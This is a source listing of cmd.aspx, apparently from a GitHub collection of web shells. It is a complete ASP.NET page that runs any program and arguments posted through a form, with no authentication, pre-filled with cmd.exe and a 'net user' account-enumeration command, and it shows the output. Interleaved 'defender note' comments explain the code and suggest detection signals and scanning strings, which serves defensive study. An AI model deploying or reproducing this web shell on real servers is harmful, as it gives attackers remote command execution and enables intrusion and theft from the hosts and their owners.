/fuzzdb-webshell/asp/cmd.aspx

https://github.com/chickenlove/webshell · ASP.NET · 37 lines · 32 code · 5 blank · 0 comment · 0 complexity · 19afd572720b56cada666600945a4b75 MD5 · raw file

  1. <%@ Page Language="VB" Debug="true" %>
  2. <%@ import Namespace="system.IO" %>
  3. <%@ import Namespace="System.Diagnostics" %>
  4. <script runat="server">
  5. Sub RunCmd(Src As Object, E As EventArgs)
     ' Server-side click handler for the "Run" button on this page.
     ' It starts an operating-system process whose executable path is read from
     ' the xpath text box and whose argument string is read from the xcmd text
     ' box, then writes the process's standard output into the result label.
     '
     ' Defender note: both values are posted form fields, and nothing in this
     ' handler authenticates the caller or restricts what may be launched. Anyone
     ' who can reach the page can therefore run programs on the host, which is
     ' the defining behaviour of a command-execution web shell.
     ' The child process is created by the web application's worker process, so
     ' process-creation telemetry showing the web server worker (typically
     ' w3wp.exe on IIS, confirm for the host) as the parent of a command
     ' interpreter is a useful detection signal.
  6. Dim myProcess As New Process()
     ' Executable path is taken verbatim from the xpath form field.
  7. Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
     ' .NET requires UseShellExecute = false before standard output can be redirected.
  8. myProcessStartInfo.UseShellExecute = false
  9. myProcessStartInfo.RedirectStandardOutput = true
  10. myProcess.StartInfo = myProcessStartInfo
     ' Argument string is taken verbatim from the xcmd form field.
  11. myProcessStartInfo.Arguments=xcmd.text
     ' Process creation happens here, once per button click.
  12. myProcess.Start()
  13. Dim myStreamReader As StreamReader = myProcess.StandardOutput
     ' Reads until the child closes its standard output, so the request stays
     ' open for as long as the child keeps that stream open.
  14. Dim myString As String = myStreamReader.Readtoend()
     ' Releases the resources held by this Process object.
  15. myProcess.Close()
     ' Angle brackets are escaped so the captured output is displayed as text
     ' rather than interpreted as markup by the browser.
  16. mystring=replace(mystring,"<","&lt;")
  17. mystring=replace(mystring,">","&gt;")
     ' The output is returned in the HTTP response body inside a <pre> element.
  18. result.text= vbcrlf & "<pre>" & mystring & "</pre>"
  19. End Sub
  20. </script>
  <%-- Web form that drives the RunCmd handler: a text box for the program path,
       a text box for its arguments, a Run button, and a label that receives the
       captured output. --%>
  <%-- Defender note: this page contains no login control or authorization check;
       any access restriction would have to come from site configuration that is
       not shown here. The control ids (xpath, xcmd, result), the pre-filled
       values and the onclick wiring are fixed strings in this file, so they can
       be used for content-based scanning of web roots. A file hash matches only
       this exact copy. --%>
  21. <html>
  22. <body>
  <%-- runat="server" makes the form post back to this same page. --%>
  23. <form runat="server">
  24. <p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
  <%-- Pre-filled with the Windows command interpreter path; the posted value is
       used as the executable path in RunCmd. --%>
  25. <asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
  26. <p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
  <%-- Pre-filled with an account-enumeration command; the posted value is used
       as the argument string in RunCmd. --%>
  27. <asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
  <%-- onclick="runcmd" binds to Sub RunCmd; VB identifiers are case-insensitive. --%>
  28. <p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
  <%-- Receives the captured command output from RunCmd. --%>
  29. <p><asp:Label id="result" runat="server"></asp:Label>
  30. </form>
  31. </body>
  32. </html>